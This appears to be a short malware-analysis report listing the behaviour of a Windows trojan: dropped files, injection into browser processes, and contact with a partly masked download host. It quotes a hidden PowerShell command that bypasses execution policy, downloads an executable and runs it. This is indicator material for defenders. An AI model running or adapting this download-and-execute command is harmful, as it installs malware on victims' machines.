Technical Information
- http://we###alls.com/rounder.exe as %appdata%\rounder.exe
- %WINDIR%\explorer.exe
- iexplore.exe
- iexplore.exe process, wininet.dll module
- firefox.exe process, nss3.dll module
- %WINDIR%\syswow64\autochk.exe
- %TEMP%\abdtfhgxgeghdp‹.sct
- %APPDATA%\rounder.exe
- %TEMP%\abdtfhgxgeghdp‹.sct
- %APPDATA%\rounder.exe
- 'we###alls.com':80
- http://we###alls.com/Rounder.exe
- DNS ASK we###alls.com
- '%APPDATA%\rounder.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://we###alls.com/Rounder.exe','%APPDATA%\Rounder.exe');Start-Process '%AP...' (with hidden window)
- '%WINDIR%\syswow64\wininit.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%APPDATA%\Rounder.exe"